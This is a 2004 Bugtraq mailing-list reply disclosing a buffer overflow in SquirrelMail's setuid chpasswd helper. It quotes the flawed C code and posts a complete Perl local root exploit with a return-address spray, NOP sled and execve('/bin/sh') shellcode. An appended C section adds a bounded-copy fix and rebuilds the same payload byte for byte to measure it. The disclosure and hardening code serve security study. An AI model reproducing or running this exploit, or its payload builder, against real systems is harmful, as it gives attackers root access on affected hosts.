Date: 19 Apr 2004 18:15:46 -0000
From: <rip@...rflow.no>
To: bugtraq@...urityfocus.com
Subject: Re: Squirrelmail Chpasswod bof


In-Reply-To: <20040417193848.GA31925@...er.madduck.net>

Hi
>> webmaster@...o:/mnt/hosting/hack/bof$ ./exploit 166 5555 99999
>
>can we please see the code for this exploit?

Certainly, but I admire your courage to ask for such a simple one, though :]
Let's take a quick peek at chpasswd.c:
<---snip--->
#define STR_MAX 100
#define MAXLEN 1024

/* in main, static, my favourite */
char User[STR_MAX];
char buf[MAXLEN];
char PUser[50];
char New_pw[50];
char Old_pw[50];

/* now let's up our privilege without really needing it yet */
if((setuid(0)) < 0) eperror("setuid");
if((setgid(3)) < 0) eperror("setgid");

/* now let's hand over control to someone, heh:
 * argv[] is copied with no length check into 100- and 50-byte buffers */
sprintf(User,"%s",argv[1]);	/* heh */
sprintf(Old_pw,"%s",argv[2]);	/* heh */
sprintf(New_pw,"%s",argv[3]);	/* heh */

/* some humor */
if(!strcmp(User,"root")){
	printf("The %s user cannot be edited for security reasons.\n",User);
	return 4; /* the root user cannot be edited for security reasons */
}

/* ..  snip .. */
strcpy(PUser,User);	/* heh! up to STR_MAX bytes into a 50-byte buffer */

/* we all see the problems here, no? */
<---snip--->
Some lame 5-minute code; it should exploit the same thing Matias did:

<---begin--->
#!/usr/bin/perl -w
# i guess this ain't of much use unless you have a web-account
# or something on the host, heh. this should be pretty selfexplanatory
# - rip
use strict;

my $ret     = 0xbffff732;  # return address; worked for me, prolly won't for you. change it.
my $length  = 190;         # buffer length for smashing without ruining it (passed along, not used)
my $eipdist = 144;         # distance to the saved eip: that many bytes of $ret go in first
my $offset  = 0;           # added to $ret, settable from the command line
my $numnops = 10;          # number of nops in the sled before the shellcode
my $nop     = "\x90";      # nop
my $pw      = 'heh';       # random string, heh, 3 chars for current $ret

# dunno where this came from, it was just lying there.
# Linux/x86 execve("//bin/sh", ["//bin/sh", NULL], NULL); 24 bytes, no NUL bytes.
my $shellcode = "\x31\xd2\x52\x68\x6e\x2f\x73\x68" .
                "\x68\x2f\x2f\x62\x69\x89\xe3\x52" .
                "\x53\x89\xe1\x8d\x42\x0b\xcd\x80";

# Build argv[1]: $eipdist bytes of the (offset) return address repeated,
# then the nop sled, then the shellcode.
sub generate_string($$$) {
    my ($r, $o, $len) = @_;
    my $buffer = '';

    my $new_ret = pack('l', ($r + $o));   # 4-byte little-endian on x86

    for (my $i = 0; $i < $eipdist; $i += 4) { $buffer .= $new_ret; }
    $buffer .= $nop x $numnops;
    $buffer .= $shellcode;

    return $buffer;
}

if ($ARGV[0]) { $offset = $ARGV[0]; }

print "[heh] moron.pl | rip\@overflow.no\n";
print "[heh] Address: 0x", sprintf('%lx', $ret), "\n[heh] Offset $offset\n";

# argv[1] is the overflow string, argv[2] and argv[3] are the dummy passwords
my $evil = generate_string($ret, $offset, $length);
exec('./chpasswd', $evil, $pw, $pw, 0);
<---end---->

- rip
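As an added illustration (this is not rip's code and not SquirrelMail's chpasswd.c), the following C shows the bounded-copy check that the quoted snippet lacks, and rebuilds the argv[1] string that moron.pl produces so its length can be compared against the buffers it lands in. The buffer sizes are the ones quoted from chpasswd.c above; the payload layout, parameters and shellcode bytes are taken from the Perl script; the function names (copy_bounded, validate_args, payload_len, build_payload, payload_rejected) are my own and not part of any real tool. The shellcode is kept only as data and is never executed.

```c
#include <stdio.h>
#include <string.h>

/* Buffer sizes as quoted from chpasswd.c in the post above. */
#define STR_MAX   100   /* User[]                */
#define PUSER_MAX 50    /* PUser[]               */
#define PW_MAX    50    /* Old_pw[] and New_pw[] */

/* Copy src into dst only if it fits together with its terminating NUL.
 * Rejecting instead of truncating keeps an over-long user name from
 * silently becoming a different, shorter user name.  0 = ok, -1 = too long. */
static int copy_bounded(char *dst, size_t dstsz, const char *src)
{
    size_t n = strlen(src);
    if (dstsz == 0 || n >= dstsz)
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Hardened counterpart of the argv handling in the snippet.  Each argument is
 * checked against the SMALLEST buffer it is ever copied into: User[100] is
 * later strcpy'd into PUser[50], so 50 is the real limit for argv[1].  This
 * belongs before setuid()/setgid(), not after.  Returns 0 if everything fits,
 * 1/2/3 for an over-long user/old/new argument, 4 for the root refusal. */
int validate_args(const char *user, const char *old_pw, const char *new_pw)
{
    char puser[PUSER_MAX], oldb[PW_MAX], newb[PW_MAX];

    if (copy_bounded(puser, sizeof puser, user) != 0)   return 1;
    if (copy_bounded(oldb, sizeof oldb, old_pw) != 0)   return 2;
    if (copy_bounded(newb, sizeof newb, new_pw) != 0)   return 3;
    if (strcmp(puser, "root") == 0)                     return 4;
    return 0;
}

/* The 24-byte Linux/x86 execve("//bin/sh") payload from the Perl script,
 * kept here only as data so the argv[1] layout can be rebuilt and measured. */
static const unsigned char shellcode[] =
    "\x31\xd2"                  /* xor  edx,edx                        */
    "\x52"                      /* push edx          (NUL terminator)  */
    "\x68\x6e\x2f\x73\x68"      /* push "n/sh"                         */
    "\x68\x2f\x2f\x62\x69"      /* push "//bi"       -> "//bin/sh"     */
    "\x89\xe3"                  /* mov  ebx,esp      ebx = filename    */
    "\x52\x53"                  /* push edx; push ebx                  */
    "\x89\xe1"                  /* mov  ecx,esp      ecx = argv        */
    "\x8d\x42\x0b"              /* lea  eax,[edx+11] eax = __NR_execve */
    "\xcd\x80";                 /* int  0x80                           */
#define SHELLCODE_LEN (sizeof shellcode - 1)

/* Length generate_string() produces: eipdist rounded up to whole 4-byte
 * words of return address, plus the nop sled and the shellcode. */
size_t payload_len(size_t eipdist, size_t numnops)
{
    return ((eipdist + 3) / 4) * 4 + numnops + SHELLCODE_LEN;
}

/* Rebuild argv[1] exactly as generate_string() does.  Returns the payload
 * length, or 0 if out cannot hold it plus a terminating NUL. */
size_t build_payload(unsigned char *out, size_t outsz,
                     unsigned long ret, size_t eipdist, size_t numnops)
{
    size_t words = (eipdist + 3) / 4, pos = 0;

    if (payload_len(eipdist, numnops) + 1 > outsz)
        return 0;
    while (pos < words * 4) {                   /* pack('l', $ret) repeated */
        out[pos++] = (unsigned char)(ret);
        out[pos++] = (unsigned char)(ret >> 8);
        out[pos++] = (unsigned char)(ret >> 16);
        out[pos++] = (unsigned char)(ret >> 24);
    }
    memset(out + pos, 0x90, numnops);           /* nop sled */
    pos += numnops;
    memcpy(out + pos, shellcode, SHELLCODE_LEN);
    pos += SHELLCODE_LEN;
    out[pos] = '\0';
    return pos;
}

/* Run the script's own payload (ret 0xbffff732, eipdist 144, 10 nops, "heh"
 * for both passwords) through the hardened check: 1 means argv[1] rejected. */
int payload_rejected(void)
{
    unsigned char buf[512];
    if (build_payload(buf, sizeof buf, 0xbffff732UL, 144, 10) == 0)
        return -1;
    return validate_args((const char *)buf, "heh", "heh");
}

int main(void)
{
    printf("payload length %zu vs User[%d] / PUser[%d]\n",
           payload_len(144, 10), STR_MAX, PUSER_MAX);
    printf("validate_args(payload) = %d\n", payload_rejected());
    return 0;
}
```

With the script's defaults the user argument is 178 bytes: it overruns User[100] in the sprintf and, had it survived that, would overrun PUser[50] again in the strcpy. A 60-character name passes the first buffer and only fails at the second, which is why the check has to use the smallest sink, not the first one.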

